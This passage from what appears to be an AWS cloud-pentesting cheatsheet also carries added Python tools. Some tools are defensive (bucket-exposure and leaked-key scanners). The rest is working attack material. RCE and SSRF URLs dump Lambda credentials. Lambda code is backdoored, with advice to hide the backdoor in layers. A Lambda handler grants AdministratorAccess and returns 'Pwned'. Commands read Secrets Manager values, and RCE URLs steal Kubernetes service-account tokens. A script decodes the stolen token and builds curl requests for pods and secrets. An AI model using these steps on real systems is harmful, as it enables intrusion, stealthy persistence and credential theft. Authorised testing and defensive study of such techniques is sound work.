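    "BlockPublicAcls": True, "IgnorePublicAcls": True,
    "BlockPublicPolicy": True, "RestrictPublicBuckets": True}}


def _as_list(v) -> list:
    return v if isinstance(v, list) else [v] if v is not None else []


def _is_public_principal(principal) -> bool:
    """Principal "*" or {"AWS": "*"} means any caller, anonymous included."""
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS"))


def assess_bucket(acl: dict, pab: Optional[dict], policy_out: Optional[dict] = None) -> Dict:
    """Combine ACL, bucket policy and Public Access Block into one verdict.
    Returns {"public": bool, "findings": [...]}; "public" is only set for
    grants that are effective (not neutralised by the block settings)."""
    cfg = (pab or {}).get("PublicAccessBlockConfiguration", {})
    findings: List[str] = []
    public = False
    for grant in acl.get("Grants", []):
        uri = grant.get("Grantee", {}).get("URI")
        if uri not in PUBLIC_GROUPS:
            continue
        who = PUBLIC_GROUPS[uri]
        if cfg.get("IgnorePublicAcls"):
            findings.append(f"ACL grants {grant['Permission']} to {who}, neutralised by IgnorePublicAcls")
        else:
            findings.append(f"ACL grants {grant['Permission']} to {who} (effective)")
            public = True
    if policy_out:
        doc = json.loads(policy_out["Policy"])
        for i, st in enumerate(_as_list(doc.get("Statement"))):
            if st.get("Effect") != "Allow" or not _is_public_principal(st.get("Principal")):
                continue
            actions = ",".join(_as_list(st.get("Action")))
            if cfg.get("RestrictPublicBuckets"):
                findings.append(f"policy statement {i} allows {actions} to everyone, neutralised by RestrictPublicBuckets")
            elif "Condition" in st:
                # A Condition (source VPC, IP range...) may narrow "everyone"; needs a human look.
                findings.append(f"policy statement {i} allows {actions} to everyone under a Condition (review it)")
            else:
                findings.append(f"policy statement {i} allows {actions} to everyone (effective)")
                public = True
    return {"public": public, "findings": findings}


if __name__ == "__main__":
    print("no block:", assess_bucket(SAMPLE_ACL, None, SAMPLE_POLICY))
    print("hardened:", assess_bucket(SAMPLE_ACL, HARDENED_PAB, SAMPLE_POLICY))
```

<p>The hardened case still lists both grants as findings even though nothing is effectively public: the block settings are a safety net, and the underlying ACL and policy should be cleaned up so that the bucket does not become public the day someone relaxes them.</p>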
<h2 id="data-exfiltration">Data Exfiltration</h2>
<ul>
<li>It’s possible to brute-force files in the bucket</li>
<li>If the bucket is misconfigured, we can read data through the web browser, the CLI/API or a time-limited URL.</li>
</ul>
<h3 id="public-access">Public Access</h3>
<ul>
<li>Just enter the URL in the browser</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://bucket-name.region.amazonaws.com/secret.txt
</code></pre></div></div>
<h3 id="authenticated-user">Authenticated User</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3api get-object --bucket name --key object-name download-file-location
</code></pre></div></div>
<h3 id="time-based-url">Time-Based Url</h3>
<ul>
<li>Generate a time-limited URL for an object</li>
<li>Useful if the object is not public</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws s3 presign s3://bucket-name/object-name --expires-in 604800
</code></pre></div></div>
<h1 id="lambda--api-gateway">Lambda & API Gateway</h1>
<ul>
<li>Serverless, event-driven platform</li>
<li>Runs code in response to events and automatically manages the computing resources required by that code</li>
<li>Can be triggered by other AWS services or called directly through API Gateway</li>
<li>A Lambda function is a piece of code that is executed whenever it is triggered by an event from an event source</li>
<li>API Gateway is an AWS service for creating, publishing, maintaining, monitoring and securing REST, HTTP and WebSocket APIs</li>
<li>API Gateway can be used to trigger Lambda functions in a synchronous (API Gateway), asynchronous (event) or stream (poll-based) way.</li>
<li>If we find a Lambda function that accesses S3 (for example), it’s possible to change its code and gain access to the files.</li>
<li>If API Gateway is used, we can enumerate the API to see how it’s possible to invoke the Lambda function (craft the URL).</li>
</ul>
<h2 id="enumeration-1">Enumeration</h2>
<h3 id="listing-all-lambda-functions">Listing All lambda functions</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-functions
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-lambda-function">Listing information about a specific lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name function_name
</code></pre></div></div>
<ul>
<li><em>This command enables us to download the source code of the lambda function</em></li>
</ul>
<h3 id="listing-policy-information-about-the-function">Listing policy information about the function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-policy --function-name function_name
</code></pre></div></div>
<ul>
<li>This command gives us information such as who can execute the function, its ID and other details</li>
</ul>
<h3 id="listing-the-event-source-mapping-information-about-a-lambda-function">Listing the event source mapping information about a lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-event-source-mappings --function-name function_name
</code></pre></div></div>
<h3 id="listing-lambda-layers-depedencies">Listing Lambda Layers (Depedencies)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-layers
</code></pre></div></div>
<h3 id="listing-full-information-about-a-lambda-layer">Listing full information about a lambda layer</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-layer-version --layer-name name --version-number version_number
</code></pre></div></div>
<h3 id="listing-rest-apis">Listing Rest API’S</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-apis
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-api">Listing information about a specific API</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-api --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-endpoints">Listing information about endpoints</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resources --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-endpoint">Listing information about a specific endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resource --rest-api-id ID --resource-id ID
</code></pre></div></div>
<h3 id="listing-method-information-for-the-endpoint">Listing method information for the endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
</code></pre></div></div>
<ul>
<li>Test various methods to see which ones the API supports.</li>
</ul>
<h3 id="listing-all-versions-of-a-rest-api">Listing all versions of a rest api</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stages --rest-api-id ID
</code></pre></div></div>
<h3 id="getting-informatin-about-a-specific-version">Getting informatin about a specific version</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stage --res-api-id ID --stage-name NAME
</code></pre></div></div>
<h3 id="listing-api-keys">Listing API KEYS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-api-keys --include-values
</code></pre></div></div>
<h3 id="getting-information-about-a-specific-api-key">Getting information about a specific API Key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-api-key --api-key KEY
</code></pre></div></div>
<h2 id="initial-access">Initial Access</h2>
<ul>
<li>It’s possible to get RCE through API Gateway if it executes commands.</li>
<li>If you can execute commands, there is a way to retrieve keys from the API Gateway: just use <code class="language-plaintext highlighter-rouge">env</code>, configure <code class="language-plaintext highlighter-rouge">aws cli</code> and proceed with the exploitation.</li>
</ul>
<h2 id="credential-access">Credential Access</h2>
<p>Getting credentials from Lambda can be done in 2 ways</p>
<ol>
<li>Keys in the source code</li>
<li>Keys in the environment variables</li>
</ol>
<p>These keys can be gathered using SSRF, RCE and so on.</p>
<h3 id="getting-credentials-using-rce">Getting credentials using RCE</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/system?cmd=env
</code></pre></div></div>
<h3 id="getting-credentials-using-ssrf">Getting credentials using SSRF</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/next
</code></pre></div></div>
<h3 id="getting-credentials-using-ssrf-and-wrappers">Getting credentials using SSRF and wrappers</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://apigateway/prod/system?cmd=file:///proc/self/environ
</code></pre></div></div>
<h3 id="getting-credentials-from-lambda-enviroment-variables-cli">Getting credentials from lambda enviroment variables (cli)</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name NAME
</code></pre></div></div>
<ul>
<li>It’s important to enumerate the functions first with <code class="language-plaintext highlighter-rouge">aws lambda list-functions</code></li>
</ul>
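<p>For whoever owns these functions, the same <code class="language-plaintext highlighter-rouge">get-function</code> output is where to look before an attacker does. The runtime's own credentials come from the execution role (that is what the <code class="language-plaintext highlighter-rouge">env</code> trick above reveals, and they expire), whereas a long-term access key pasted into an environment variable keeps working after the function is gone. The following scanner is an added example, not code from the original post: it flags variables whose value looks like an IAM access key id (long-term ids start with <code class="language-plaintext highlighter-rouge">AKIA</code>, temporary ones with <code class="language-plaintext highlighter-rouge">ASIA</code>) or whose name suggests a credential. The function, role and variable values are constructed.</p>

```python
import re
from typing import Dict, List

# Long-term IAM access key ids start with AKIA, temporary (STS) ones with ASIA.
ACCESS_KEY_ID_RE = re.compile(r"\b(AKIA|ASIA)[0-9A-Z]{16}\b")
SECRET_NAME_RE = re.compile(
    r"(secret|password|passwd|token|api[_-]?key|access[_-]?key|private[_-]?key)", re.I)

# Constructed: the shape of `aws lambda get-function` output, trimmed to what we read.
SAMPLE_GET_FUNCTION = {
    "Configuration": {
        "FunctionName": "reporting",
        "Role": "arn:aws:iam::123456789012:role/reporting-lambda-role",
        "Environment": {"Variables": {
            "BUCKET": "reports-example",
            "AWS_ACCESS_KEY_ID_BACKUP": "AKIAEXAMPLE12345EXAM",  # constructed, key-id shaped
            "DB_PASSWORD": "hunter2",                              # constructed
            "LOG_LEVEL": "info"}}},
    "Code": {"RepositoryType": "S3", "Location": "https://example.invalid/presigned-code-url"},
}


def scan_function(get_function_output: dict) -> Dict:
    """Report credential-looking environment variables of one Lambda function.
    Returns {"function", "role", "findings": [{"variable", "reason"}, ...]}."""
    cfg = get_function_output.get("Configuration", {})
    variables = (cfg.get("Environment") or {}).get("Variables") or {}
    findings: List[Dict[str, str]] = []
    for name, value in variables.items():
        if ACCESS_KEY_ID_RE.search(str(value)):
            # Strongest signal: the value itself is shaped like an access key id.
            findings.append({"variable": name, "reason": "value looks like an IAM access key id"})
        elif SECRET_NAME_RE.search(name):
            # Weaker signal: only the name hints at a secret; worth a look, may be a false positive.
            findings.append({"variable": name, "reason": "name suggests a credential"})
    return {"function": cfg.get("FunctionName", "?"),
            "role": cfg.get("Role", "?"),
            "findings": findings}


def scan_functions(outputs) -> List[Dict]:
    """Scan several get-function outputs and keep only the ones with findings."""
    return [r for r in (scan_function(o) for o in outputs) if r["findings"]]


if __name__ == "__main__":
    for report in scan_functions([SAMPLE_GET_FUNCTION]):
        print(report["function"], "runs as", report["role"])
        for f in report["findings"]:
            print("  ", f["variable"], "->", f["reason"])
```

<p>A long-term key found this way should be rotated, not just deleted from the function, since the same key may have been copied into the source bundle (the first of the two places the section lists) or into a layer.</p>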
<h2 id="persistence">Persistence</h2>
<ul>
<li>If the user has sufficient rights on the Lambda function, it’s possible to download the source code, add a backdoor to it and upload it again. Every time the Lambda executes, the malicious code will also execute.</li>
<li>Always try to update the code of layers (dependencies) instead of the actual Lambda code; this way our backdoor will be more difficult to detect.</li>
</ul>
<h3 id="checking-which-user-is-executing">Checking which user is executing</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws sts get-caller-identity
</code></pre></div></div>
<h3 id="checking-all-managed-policies-attached-to-the-user">Checking all managed policies attached to the user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
<h3 id="checking-informations-about-a-specific-policy">Checking informations about a specific policy</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id ID
</code></pre></div></div>
<h3 id="listing-all-lambda-functions-1">Listing all lambda functions</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda list-functions --region region
</code></pre></div></div>
<h3 id="listing-information-about-the-specified-lambda">Listing information about the specified lambda</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-function --function-name name
</code></pre></div></div>
<ul>
<li>Download the deployment package from the Code.Location URL and analyze the code</li>
</ul>
<h3 id="listing-policy-information-about-the-specific-lambda-function">Listing the resource-based policy of a specific lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda get-policy --function-name name --profile profile --region region
</code></pre></div></div>
<ul>
<li>Shows which principals (API Gateway, S3, other accounts) may invoke the function and which source ARN is allowed to; this helps build the request that triggers the function.</li>
</ul>
<h3 id="listing-rest-apis-1">Listing Rest API’S</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-apis
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-api-1">Listing information about a specific API</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-rest-api --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-endpoints-1">Listing information about endpoints</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resources --rest-api-id ID
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-endpoint-1">Listing information about a specific endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-resource --rest-api-id ID --resource-id ID
</code></pre></div></div>
<h3 id="listing-method-information-for-the-endpoint-1">Listing method information for the endpoint</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-method --rest-api-id ApiID --resource-id ID --http-method method
</code></pre></div></div>
<ul>
<li>Test the other HTTP methods too; get-method returns NotFoundException for methods the resource does not define.</li>
</ul>
<h3 id="listing-all-versions-of-a-rest-api-1">Listing all stages (deployed versions) of a REST API</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stages --rest-api-id ID
</code></pre></div></div>
<h3 id="getting-informatin-about-a-specific-version-1">Getting information about a specific stage</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws apigateway get-stage --rest-api-id ID --stage-name NAME
</code></pre></div></div>
<h3 id="uploading-the-backdoor-code-to-aws-lambda-function">Uploading the backdoor code to aws lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda update-function-code --function-name function --zip-file fileb://my-function.zip
</code></pre></div></div>
<h3 id="invoke-the-function">Invoke the Function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl https://uj3948ie.execute-api.us-east-2.amazonaws.com/default/EXAMPLE
</code></pre></div></div>
<p>Where</p>
<ol>
<li>API-ID -> uj3948ie</li>
<li>Region -> us-east-2</li>
<li>Resource (Endpoint) -> EXAMPLE</li>
<li>Method -> GET</li>
<li>Stage (Version) -> default</li>
<li>API-Key -> None</li>
</ol>
<p><em>All these details are gathered during the enumeration.</em></p>
<h2 id="privilege-escalation-1">Privilege Escalation</h2>
<ul>
<li>If our user has iam:PassRole, lambda:CreateFunction and lambda:InvokeFunction, and there is a role we are allowed to pass that itself has iam:AttachRolePolicy / iam:AttachUserPolicy, we can create a function running as that role whose code makes the role, and then our user, an Administrator.</li>
</ul>
<h3 id="create-a-lambda-function-and-attach-a-role-to-it">Create a lambda function and attach a role to it</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda create-function --function-name my-function --runtime python3.7 --zip-file fileb://my-function.zip --handler my-function.handler --role ARN --region region
</code></pre></div></div>
<ul>
<li>The handler is file.function: with --handler my-function.handler the zip must contain my-function.py defining handler(). The role ARN must be one we may pass (iam:PassRole) and it must carry the IAM permissions the code below uses.</li>
<li>Inside the function’s code, we add the administrator permission to the role and to our user</li>
</ul>
<h4 id="example-code-to-add-the-permissions">Example code to add the permissions</h4>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import json

import boto3

# Both calls run under the function's execution role, so that role (not the
# invoking user) is what needs iam:AttachRolePolicy and iam:AttachUserPolicy.
ADMIN_POLICY = "arn:aws:iam::aws:policy/AdministratorAccess"  # AWS managed policy


def handler(event, context):
    iam = boto3.client("iam")
    # Make the execution role itself an administrator...
    iam.attach_role_policy(RoleName="ROLE_NAME", PolicyArn=ADMIN_POLICY)
    # ...and then the IAM user whose keys we hold.
    iam.attach_user_policy(UserName="USER_NAME", PolicyArn=ADMIN_POLICY)
    return {
        "statusCode": 200,
        "body": json.dumps("Pwned"),
    }
</code></pre></div></div>
<h3 id="invoke-a-lambda-function">Invoke a lambda function</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws lambda invoke --function-name name response.json --region region
</code></pre></div></div>
<h3 id="listing-managed-policies-to-see-if-the-change-worked">Listing managed policies to see if the change worked</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name user_name
</code></pre></div></div>
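<p>Every path in this cheatsheet starts the same way: <code class="language-plaintext highlighter-rouge">aws iam get-policy-version</code> followed by a manual read of the JSON. The Python below is an added example, not part of the original cheatsheet: it takes the PolicyVersion.Document, expands IAM’s wildcard action matching, lets an explicit Deny win, and reports which of the escalation paths described on this page (the Lambda PassRole chain above, plus the EC2 instance-profile attach and EBS snapshot exfiltration further down) the principal is allowed to attempt. The sample policy is constructed and the path names are ours. Resource and Condition constraints are deliberately ignored, so a hit means “worth trying”, not “guaranteed”.</p>

```python
"""Flag privilege-escalation-relevant actions in an IAM policy document.

Added example (not from the original cheatsheet). Feed it the
PolicyVersion.Document returned by `aws iam get-policy-version`.
"""
import fnmatch
import json

# Action sets for the escalation paths discussed on this page. The path names
# are ours; the IAM action names are real.
ESCALATION_PATHS = {
    "lambda-create-with-passed-role": {
        "iam:PassRole", "lambda:CreateFunction", "lambda:InvokeFunction"},
    "lambda-backdoor-existing-code": {"lambda:UpdateFunctionCode"},
    "ec2-attach-instance-profile": {
        "iam:PassRole", "ec2:AssociateIamInstanceProfile"},
    "iam-attach-admin-policy": {"iam:AttachUserPolicy"},
    "secretsmanager-read": {"secretsmanager:GetSecretValue"},
    "ebs-snapshot-exfil": {
        "ec2:CreateSnapshot", "ec2:CreateVolume", "ec2:AttachVolume"},
}


def _as_list(value):
    """IAM lets Statement / Action / Resource be a single string or a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def allowed_actions(document, candidates):
    """Return the subset of `candidates` the policy allows.

    Resource-level and Condition restrictions are ignored on purpose: this is
    triage ("is the path even worth trying?"), not full IAM evaluation.
    An explicit Deny beats any Allow, as in IAM.
    """
    allow, deny = set(), set()
    for stmt in _as_list(document.get("Statement")):
        target = allow if stmt.get("Effect") == "Allow" else deny
        for pattern in _as_list(stmt.get("Action")):
            # IAM action matching is case-insensitive and supports '*' and '?'.
            for action in candidates:
                if fnmatch.fnmatchcase(action.lower(), pattern.lower()):
                    target.add(action)
        # NotAction inverts the match and is rare in user policies; stop and
        # make the reader look rather than silently mis-evaluating it.
        if "NotAction" in stmt:
            raise ValueError("NotAction statement present; review manually")
    return allow - deny


def escalation_paths(document):
    """Name every escalation path whose full action set is allowed."""
    needed = set().union(*ESCALATION_PATHS.values())
    have = allowed_actions(document, needed)
    return sorted(name for name, acts in ESCALATION_PATHS.items() if acts <= have)


# Constructed sample: what `aws iam get-policy-version --query
# PolicyVersion.Document` might return for a developer's policy.
SAMPLE_POLICY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["lambda:*", "iam:PassRole"], "Resource": "*"},
    {"Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"},
    {"Effect": "Deny", "Action": "lambda:UpdateFunctionCode", "Resource": "*"}
  ]
}
""")

if __name__ == "__main__":
    for path in escalation_paths(SAMPLE_POLICY):
        print("possible:", path)
```

<p>With the sample policy the only reported path is lambda-create-with-passed-role: lambda:* grants CreateFunction and InvokeFunction, PassRole is explicit, and the Deny removes UpdateFunctionCode even though lambda:* would otherwise cover it. Pipe the real document in with <code class="language-plaintext highlighter-rouge">--query PolicyVersion.Document</code> and json.load instead of the constructed string.</p>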
<h1 id="aws-secret-manager">AWS Secrets Manager</h1>
<ul>
<li>AWS service that encrypts and stores secrets (database passwords, API keys and so on)</li>
<li>Transparently decrypts and returns them in plaintext to any principal allowed to call GetSecretValue</li>
<li>KMS holds the encryption keys (the default AWS managed key aws/secretsmanager, or a customer managed key)</li>
<li>Both symmetric and asymmetric keys can be created in KMS; Secrets Manager itself only uses symmetric keys</li>
</ul>
<h2 id="enumeration-2">Enumeration</h2>
<h3 id="listing-all-secrets-stored-by-secret-manager">Listing all secrets stored by Secret Manager</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager list-secrets
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-secret">Listing information about a specific secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager describe-secret --secret-id name
</code></pre></div></div>
<h3 id="getting-policies-attached-to-the-specified-secret">Getting policies attached to the specified secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-resource-policy --secret-id ID
</code></pre></div></div>
<h3 id="listing-keys-in-kms">Listing keys in KMS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-keys
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-key">Listing information about a specific key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms describe-key --key-id ID
</code></pre></div></div>
<h3 id="listing-policies-attached-to-a-specific-key">Listing policies attached to a specific key</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-key-policies --key-id ID
</code></pre></div></div>
<h3 id="getting-full-information-about-a-policy">Getting full information about a policy</h3>
<ul>
<li>Shows who can access the keys</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms get-key-policy --policy-name name --key-id ID
</code></pre></div></div>
<h2 id="credential-exfiltration">Credential Exfiltration</h2>
<ul>
<li>If the user has secretsmanager:GetSecretValue (and kms:Decrypt on the key, when a customer managed key is used), the secrets can be read in plaintext via the console, CLI or API</li>
</ul>
<h3 id="listing-policies-attached-to-an-user">Listing policies attached to an user</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam list-attached-user-policies --user-name name
</code></pre></div></div>
<h3 id="retrieving-information-about-a-specific-version-of-policy">Retrieving information about a specific version of policy</h3>
<ul>
<li>Here we can see the permissions</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws iam get-policy-version --policy-arn arn --version-id id
</code></pre></div></div>
<h3 id="listing-all-secrets-stored-by-secret-manager-1">Listing all secrets stored by Secret Manager</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager list-secrets
</code></pre></div></div>
<h3 id="listing-information-about-a-specific-secret-1">Listing information about a specific secret</h3>
<ul>
<li>Here we get the KmsKeyId used to encrypt the secret (absent when the default aws/secretsmanager key is used) and the rotation settings</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager describe-secret --secret-id name
</code></pre></div></div>
<h3 id="getting-resource-based-policy-attached-to-an-specific-secret">Getting resource-based policy attached to a specific secret</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-resource-policy --secret-id ID
</code></pre></div></div>
<h3 id="getting-the-secret-value">Getting the secret value</h3>
<ul>
<li>Retrieves the actual value</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws secretsmanager get-secret-value --secret-id ID
</code></pre></div></div>
<h3 id="kms">KMS</h3>
<ul>
<li>If, for example, we compromise an S3 bucket holding a file encrypted with a KMS key, we can decrypt it as long as the key policy and our IAM policy grant kms:Decrypt on that key.</li>
</ul>
<h4 id="listing-an-specific-key">Listing an specific key</h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms describe-key --key-id id
</code></pre></div></div>
<h4 id="listing-policies-attached-to-an-specified-key">Listing policies attached to a specified key</h4>
<ul>
<li>Returns only the policy names (a key has exactly one, named default); the contents, and therefore who can use the key, come from get-key-policy</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms list-key-policies --key-id ID
</code></pre></div></div>
<h4 id="listing-full-information-about-a-policy">Listing full information about a policy</h4>
<ul>
<li>Run this for every key to see who is allowed to use it (kms:Decrypt grants in the key policy, plus IAM policies when the key policy delegates to IAM)</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms get-key-policy --policy-name name --key-id ID
</code></pre></div></div>
<h4 id="decrypt-the-secret-using-the-key">Decrypt the secret using the key</h4>
<ul>
<li>There is no need to specify the key for ciphertext produced with a symmetric KMS key: the key ID is embedded in the ciphertext blob (asymmetric keys require --key-id). The Plaintext field comes back base64 encoded, so decode it.</li>
</ul>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query Plaintext | base64 -d
</code></pre></div></div>
<h1 id="containers">Containers</h1>
<p>Divided into three categories</p>
<ul>
<li>Registry -> Secure place to store container images (ECR)</li>
<li>Orchestration -> Configures when and where the containers run (ECS, EKS)</li>
<li>Compute -> Where the containers actually execute (EC2, Fargate)</li>
<li>It’s possible to create a backdoored image and add it to an EKS cluster</li>
<li>Always look at how the VPCs communicate with each other; it may be possible to pivot from another VPC into the EKS VPC and compromise the entire cluster</li>
</ul>
<h2 id="initial-access-1">Initial Access</h2>
<ul>
<li>Initial access is often an RCE in a web app running inside a container; from there it may be possible to compromise the underlying EC2 node.</li>
</ul>
<p>After the RCE, we can list the service-account secrets mounted into the pod (EKS)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount
</code></pre></div></div>
<h3 id="getting-the-secret-information-from-eks">Getting the secret information from EKS</h3>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token
</code></pre></div></div>
<ul>
<li>The directory also holds ca.crt and namespace; the token is a JWT that authenticates the pod’s service account to the Kubernetes API server.</li>
<li>It’s also possible to attempt a container escape (Tool: <code class="language-plaintext highlighter-rouge">deepce</code>)</li>
</ul>
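<p>What to do with the token just read. The Python below is an added example, not part of the original cheatsheet: it decodes the service-account JWT (the payload is plain base64url, no key is needed to read it) to learn the namespace and account the pod runs as, handles both the legacy and the bound-token claim layouts, and builds the first API-server requests worth sending with it. The token in the block is constructed with a bogus signature.</p>

```python
"""Decode a Kubernetes service-account token read from
/var/run/secrets/kubernetes.io/serviceaccount/token.

Added example, not part of the original cheatsheet. The sample token is
constructed here with a bogus signature.
"""
import base64
import json


def b64url_decode(part):
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))


def decode_sa_token(token):
    """Return (header, claims). The signature is NOT verified here: we only
    want to read who we are; the API server does the verifying."""
    header, payload, _signature = token.split(".")
    return json.loads(b64url_decode(header)), json.loads(b64url_decode(payload))


def sa_identity(token):
    """Return (namespace, service account name) the pod runs as."""
    _, claims = decode_sa_token(token)
    if "kubernetes.io" in claims:  # bound/projected token (default since k8s 1.21)
        k = claims["kubernetes.io"]
        return k["namespace"], k["serviceaccount"]["name"]
    return (claims["kubernetes.io/serviceaccount/namespace"],  # legacy secret-based token
            claims["kubernetes.io/serviceaccount/service-account.name"])


def api_probe_commands(token):
    """First requests worth making from inside the pod with the stolen token.
    KUBERNETES_SERVICE_HOST/PORT are injected into every pod's environment."""
    ns, _ = sa_identity(token)
    sa_dir = "/var/run/secrets/kubernetes.io/serviceaccount"
    base = (f'curl -s --cacert {sa_dir}/ca.crt -H "Authorization: Bearer {token}" '
            f"https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT")
    return [f"{base}/api/v1/namespaces/{ns}/pods",     # what runs next to us
            f"{base}/api/v1/namespaces/{ns}/secrets"]  # the prize if RBAC is lax


def _b64url(obj):
    """Encode a JSON-serialisable object as an unpadded base64url JWT segment."""
    return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()


# Constructed legacy-format token for the demo (signature is nonsense).
SAMPLE_TOKEN = ".".join([
    _b64url({"alg": "RS256", "kid": "constructed"}),
    _b64url({"iss": "kubernetes/serviceaccount",
             "kubernetes.io/serviceaccount/namespace": "webapp",
             "kubernetes.io/serviceaccount/service-account.name": "default",
             "sub": "system:serviceaccount:webapp:default"}),
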